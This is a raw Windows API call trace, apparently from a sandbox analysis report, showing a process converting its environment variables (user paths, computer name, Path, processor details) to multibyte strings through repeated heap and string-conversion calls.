WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0060.423] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x36) returned 0x32010c8 [0060.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x32010c8, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpUsedDefaultChar=0x0) returned 54 [0060.423] GetLastError () returned 0x0 [0060.423] SetLastError (dwErrCode=0x0) [0060.423] GetLastError () returned 0x0 [0060.423] SetLastError (dwErrCode=0x0) [0060.423] GetLastError () returned 0x0 [0060.424] SetLastError (dwErrCode=0x0) [0060.424] RtlSizeHeap (HeapHandle=0x31e0000, Flags=0x0, MemoryPointer=0x32010b8) returned 0x8 [0060.424] RtlReAllocateHeap (Heap=0x31e0000, Flags=0x0, Ptr=0x32010b8, Size=0xc) returned 0x3201108 [0060.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0060.424] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x37) returned 0x3201120 [0060.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x3201120, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 55 [0060.424] GetLastError () returned 0x0 [0060.424] SetLastError (dwErrCode=0x0) [0060.424] GetLastError () returned 0x0 [0060.424] SetLastError (dwErrCode=0x0) [0060.424] GetLastError () returned 0x0 [0060.424] SetLastError (dwErrCode=0x0) [0060.424] GetLastError () returned 0x0 [0060.424] SetLastError (dwErrCode=0x0) [0060.424] GetLastError () returned 0x0 [0060.424] SetLastError (dwErrCode=0x0) [0060.424] RtlSizeHeap (HeapHandle=0x31e0000, Flags=0x0, MemoryPointer=0x3201108) returned 0xc [0060.424] RtlReAllocateHeap (Heap=0x31e0000, Flags=0x0, Ptr=0x3201108, Size=0x10) returned 0x3201108 [0060.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0060.424] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x3c) returned 0x31f5780 [0060.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x31f5780, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 60 [0060.424] GetLastError () returned 0x0 [0060.424] SetLastError (dwErrCode=0x0) [0060.424] GetLastError () returned 0x0 [0060.424] SetLastError (dwErrCode=0x0) [0060.424] GetLastError () returned 0x0 [0060.424] SetLastError (dwErrCode=0x0) [0060.424] GetLastError () returned 0x0 [0060.425] SetLastError (dwErrCode=0x0) [0060.425] GetLastError () returned 0x0 [0060.425] SetLastError (dwErrCode=0x0) [0060.425] GetLastError () returned 0x0 [0060.425] SetLastError (dwErrCode=0x0) [0060.425] GetLastError () returned 0x0 [0060.425] SetLastError (dwErrCode=0x0) [0060.425] RtlSizeHeap (HeapHandle=0x31e0000, Flags=0x0, MemoryPointer=0x3201108) returned 0x10 [0060.425] RtlReAllocateHeap (Heap=0x31e0000, Flags=0x0, Ptr=0x3201108, Size=0x14) returned 0x3201160 [0060.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0060.425] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x31) returned 0x3201180 [0060.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x3201180, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramW6432=C:\\Program Files\\Common Files", lpUsedDefaultChar=0x0) returned 49 [0060.425] GetLastError () returned 0x0 [0060.425] SetLastError (dwErrCode=0x0) [0060.425] GetLastError () returned 0x0 [0060.425] SetLastError (dwErrCode=0x0) [0060.425] GetLastError () returned 0x0 [0060.425] SetLastError (dwErrCode=0x0) [0060.425] GetLastError () returned 0x0 [0060.425] SetLastError (dwErrCode=0x0) [0060.425] GetLastError () returned 0x0 [0060.425] SetLastError (dwErrCode=0x0) [0060.425] GetLastError () returned 0x0 [0060.425] SetLastError (dwErrCode=0x0) [0060.425] GetLastError () returned 0x0 [0060.425] SetLastError (dwErrCode=0x0) [0060.425] GetLastError () returned 0x0 [0060.426] SetLastError (dwErrCode=0x0) [0060.426] GetLastError () returned 0x0 [0060.426] SetLastError (dwErrCode=0x0) [0060.426] RtlSizeHeap (HeapHandle=0x31e0000, Flags=0x0, MemoryPointer=0x3201160) returned 0x14 [0060.426] RtlReAllocateHeap (Heap=0x31e0000, Flags=0x0, Ptr=0x3201160, Size=0x18) returned 0x3201160 [0060.426] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0060.426] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x17) returned 0x32011c0 [0060.426] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x32011c0, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COMPUTERNAME=XDUWTFONO", lpUsedDefaultChar=0x0) returned 23 [0060.426] GetLastError () returned 0x0 [0060.426] SetLastError (dwErrCode=0x0) [0060.426] GetLastError () returned 0x0 [0060.426] SetLastError (dwErrCode=0x0) [0060.426] GetLastError () returned 0x0 [0060.426] SetLastError (dwErrCode=0x0) [0060.426] GetLastError () returned 0x0 [0060.426] SetLastError (dwErrCode=0x0) [0060.426] GetLastError () returned 0x0 [0060.426] SetLastError (dwErrCode=0x0) [0060.426] GetLastError () returned 0x0 [0060.426] SetLastError (dwErrCode=0x0) [0060.426] GetLastError () returned 0x0 [0060.426] SetLastError (dwErrCode=0x0) [0060.426] GetLastError () returned 0x0 [0060.426] SetLastError (dwErrCode=0x0) [0060.426] GetLastError () returned 0x0 [0060.426] SetLastError (dwErrCode=0x0) [0060.426] GetLastError () returned 0x0 [0060.426] SetLastError (dwErrCode=0x0) [0060.426] GetLastError () returned 0x0 [0060.427] SetLastError (dwErrCode=0x0) [0060.427] RtlSizeHeap (HeapHandle=0x31e0000, Flags=0x0, MemoryPointer=0x3201160) returned 0x18 [0060.427] RtlReAllocateHeap (Heap=0x31e0000, Flags=0x0, Ptr=0x3201160, Size=0x1c) returned 0x32011e0 [0060.427] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0060.427] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x24) returned 0x31fa9a0 [0060.427] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x31fa9a0, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ComSpec=C:\\Windows\\system32\\cmd.exe", lpUsedDefaultChar=0x0) returned 36 [0060.427] GetLastError () returned 0x0 [0060.427] SetLastError (dwErrCode=0x0) [0060.427] GetLastError () returned 0x0 [0060.427] SetLastError (dwErrCode=0x0) [0060.427] GetLastError () returned 0x0 [0060.427] SetLastError (dwErrCode=0x0) [0060.427] GetLastError () returned 0x0 [0060.427] SetLastError (dwErrCode=0x0) [0060.427] GetLastError () returned 0x0 [0060.427] SetLastError (dwErrCode=0x0) [0060.427] GetLastError () returned 0x0 [0060.427] SetLastError (dwErrCode=0x0) [0060.427] GetLastError () returned 0x0 [0060.427] SetLastError (dwErrCode=0x0) [0060.427] GetLastError () returned 0x0 [0060.427] SetLastError (dwErrCode=0x0) [0060.427] GetLastError () returned 0x0 [0060.427] SetLastError (dwErrCode=0x0) [0060.427] GetLastError () returned 0x0 [0060.427] SetLastError (dwErrCode=0x0) [0060.427] GetLastError () returned 0x0 [0060.427] SetLastError (dwErrCode=0x0) [0060.427] GetLastError () returned 0x0 [0060.428] SetLastError (dwErrCode=0x0) [0060.428] GetLastError () returned 0x0 [0060.428] SetLastError (dwErrCode=0x0) [0060.428] RtlSizeHeap (HeapHandle=0x31e0000, Flags=0x0, MemoryPointer=0x32011e0) returned 0x1c [0060.428] RtlReAllocateHeap (Heap=0x31e0000, Flags=0x0, Ptr=0x32011e0, Size=0x20) returned 0x32011e0 [0060.428] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0060.428] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x14) returned 0x3201160 [0060.428] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x3201160, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FP_NO_HOST_CHECK=NO", lpUsedDefaultChar=0x0) returned 20 [0060.428] GetLastError () returned 0x0 [0060.428] SetLastError (dwErrCode=0x0) [0060.428] GetLastError () returned 0x0 [0060.428] SetLastError (dwErrCode=0x0) [0060.428] GetLastError () returned 0x0 [0060.428] SetLastError (dwErrCode=0x0) [0060.428] GetLastError () returned 0x0 [0060.428] SetLastError (dwErrCode=0x0) [0060.428] GetLastError () returned 0x0 [0060.428] SetLastError (dwErrCode=0x0) [0060.428] GetLastError () returned 0x0 [0060.428] SetLastError (dwErrCode=0x0) [0060.428] GetLastError () returned 0x0 [0060.428] SetLastError (dwErrCode=0x0) [0060.428] GetLastError () returned 0x0 [0060.428] SetLastError (dwErrCode=0x0) [0060.428] GetLastError () returned 0x0 [0060.428] SetLastError (dwErrCode=0x0) [0060.428] GetLastError () returned 0x0 [0060.428] RtlSizeHeap (HeapHandle=0x31e0000, Flags=0x0, MemoryPointer=0x32011e0) returned 0x20 [0060.429] RtlReAllocateHeap (Heap=0x31e0000, Flags=0x0, Ptr=0x32011e0, Size=0x24) returned 0x32011e0 [0060.429] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0060.429] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0xd) returned 0x31fe660 [0060.429] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x31fe660, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEDRIVE=C:", lpUsedDefaultChar=0x0) returned 13 [0060.429] GetLastError () returned 0x0 [0060.429] RtlSizeHeap (HeapHandle=0x31e0000, Flags=0x0, MemoryPointer=0x32011e0) returned 0x24 [0060.429] RtlReAllocateHeap (Heap=0x31e0000, Flags=0x0, Ptr=0x32011e0, Size=0x28) returned 0x32011e0 [0060.429] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0060.429] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x25) returned 0x31fa9d0 [0060.429] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x31fa9d0, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 37 [0060.429] GetLastError () returned 0x0 [0060.429] RtlSizeHeap (HeapHandle=0x31e0000, Flags=0x0, MemoryPointer=0x32011e0) returned 0x28 [0060.429] RtlReAllocateHeap (Heap=0x31e0000, Flags=0x0, Ptr=0x32011e0, Size=0x2c) returned 0x32011e0 [0060.429] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 57 [0060.429] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x39) returned 0x31f57c8 [0060.429] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x31f57c8, cbMultiByte=57, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpUsedDefaultChar=0x0) returned 57 [0060.429] GetLastError () returned 0x0 [0060.429] RtlSizeHeap (HeapHandle=0x31e0000, Flags=0x0, MemoryPointer=0x32011e0) returned 0x2c [0060.429] RtlReAllocateHeap (Heap=0x31e0000, Flags=0x0, Ptr=0x32011e0, Size=0x30) returned 0x32011e0 [0060.429] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0060.429] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x18) returned 0x3201218 [0060.429] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x3201218, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOGONSERVER=\\\\XDUWTFONO", lpUsedDefaultChar=0x0) returned 24 [0060.429] GetLastError () returned 0x0 [0060.429] RtlSizeHeap (HeapHandle=0x31e0000, Flags=0x0, MemoryPointer=0x32011e0) returned 0x30 [0060.429] RtlReAllocateHeap (Heap=0x31e0000, Flags=0x0, Ptr=0x32011e0, Size=0x34) returned 0x3201238 [0060.429] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0060.429] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x17) returned 0x32011e0 [0060.429] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x32011e0, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NUMBER_OF_PROCESSORS=1", lpUsedDefaultChar=0x0) returned 23 [0060.429] GetLastError () returned 0x0 [0060.429] RtlSizeHeap (HeapHandle=0x31e0000, Flags=0x0, MemoryPointer=0x3201238) returned 0x34 [0060.429] RtlReAllocateHeap (Heap=0x31e0000, Flags=0x0, Ptr=0x3201238, Size=0x38) returned 0x3201238 [0060.429] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0060.429] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0xe) returned 0x31fe678 [0060.429] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x31fe678, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OS=Windows_NT", lpUsedDefaultChar=0x0) returned 14 [0060.430] GetLastError () returned 0x0 [0060.430] RtlSizeHeap (HeapHandle=0x31e0000, Flags=0x0, MemoryPointer=0x3201238) returned 0x38 [0060.430] RtlReAllocateHeap (Heap=0x31e0000, Flags=0x0, Ptr=0x3201238, Size=0x3c) returned 0x3201238 [0060.430] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 105 [0060.430] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x69) returned 0x3201280 [0060.430] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x3201280, cbMultiByte=105, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpUsedDefaultChar=0x0) returned 105 [0060.430] GetLastError () returned 0x0 [0060.430] RtlSizeHeap (HeapHandle=0x31e0000, Flags=0x0, MemoryPointer=0x3201238) returned 0x3c [0060.430] RtlReAllocateHeap (Heap=0x31e0000, Flags=0x0, Ptr=0x3201238, Size=0x40) returned 0x3201238 [0060.430] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0060.430] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x3e) returned 0x31f5810 [0060.430] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x31f5810, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", lpUsedDefaultChar=0x0) returned 62 [0060.430] GetLastError () returned 0x0 [0060.430] RtlSizeHeap (HeapHandle=0x31e0000, Flags=0x0, MemoryPointer=0x3201238) returned 0x40 [0060.430] RtlReAllocateHeap (Heap=0x31e0000, Flags=0x0, Ptr=0x3201238, Size=0x44) returned 0x32012f8 [0060.430] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0060.430] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x1b) returned 0x31fef18 [0060.430] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x31fef18, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITECTURE=x86", lpUsedDefaultChar=0x0) returned 27 [0060.430] GetLastError () returned 0x0 [0060.430] RtlSizeHeap (HeapHandle=0x31e0000, Flags=0x0, MemoryPointer=0x32012f8) returned 0x44 [0060.430] RtlReAllocateHeap (Heap=0x31e0000, Flags=0x0, Ptr=0x32012f8, Size=0x48) returned 0x32012f8 [0060.430] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0060.430] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x1d) returned 0x31fef40 [0060.430] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x31fef40, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITEW6432=AMD64", lpUsedDefaultChar=0x0) returned 29 [0060.430] GetLastError () returned 0x0 [0060.430] RtlSizeHeap (HeapHandle=0x31e0000, Flags=0x0, MemoryPointer=0x32012f8) returned 0x48 [0060.430] RtlReAllocateHeap (Heap=0x31e0000, Flags=0x0, Ptr=0x32012f8, Size=0x4c) returned 0x32012f8 [0060.430] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 72 [0060.430] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x48) returned 0x31f6ba8 [0060.430] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x31f6ba8, cbMultiByte=72, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", lpUsedDefaultChar=0x0) returned 72 [0060.430] GetLastError () returned 0x0 [0060.431] RtlSizeHeap (HeapHandle=0x31e0000, Flags=0x0, MemoryPointer=0x32012f8) returned 0x4c [0060.431] RtlReAllocateHeap (Heap=0x31e0000, Flags=0x0, Ptr=0x32012f8, Size=0x50) returned 0x32012f8 [0060.431] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0060.431] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x12) returned 0x3201238 [0060.431] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x3201238, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_LEVEL=6", lpUsedDefaultChar=0x0) returned 18 [0060.431] GetLastError () returned 0x0 [0060.431] RtlSizeHeap (HeapHandle=0x31e0000, Flags=0x0, MemoryPointer=0x32012f8) returned 0x50 [0060.431] RtlReAllocateHeap (Heap=0x31e0000, Flags=0x0, Ptr=0x32012f8, Size=0x54) returned 0x32012f8 [0060.431] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0060.431] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x18) returned 0x3201258 [0060.431] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0x3201258, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_REVISION=5504", lpUsedDefaultChar=0x0) returned 24 [0060.431] GetLastError () returned 0x0 [0060.431] RtlSizeHeap (HeapHandle=0x31e0000, Flags=0x0, MemoryPointer=0x32012f8) returned 0x54 [0060.431] RtlReAllocateHeap (Heap=0x31e0000, Flags=0x0, Ptr=0x32012f8, Size=0x58) returned 0x32012f8 [0060.431] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0060.431] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x1b) returned 0x31fef68 [0060.431] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x31fef68, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramData=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 27 [0060.431] GetLastError () returned 0x0 [0060.431] RtlSizeHeap (HeapHandle=0x31e0000, Flags=0x0, MemoryPointer=0x32012f8) returned 0x58 [0060.431] RtlReAllocateHeap (Heap=0x31e0000, Flags=0x0, Ptr=0x32012f8, Size=0x5c) returned 0x32012f8 [0060.431] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0060.431] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x24) returned 0x31faa00 [0060.431] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x31faa00, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 36 [0060.431] GetLastError () returned 0x0 [0060.431] RtlSizeHeap (HeapHandle=0x31e0000, Flags=0x0, MemoryPointer=0x32012f8) returned 0x5c 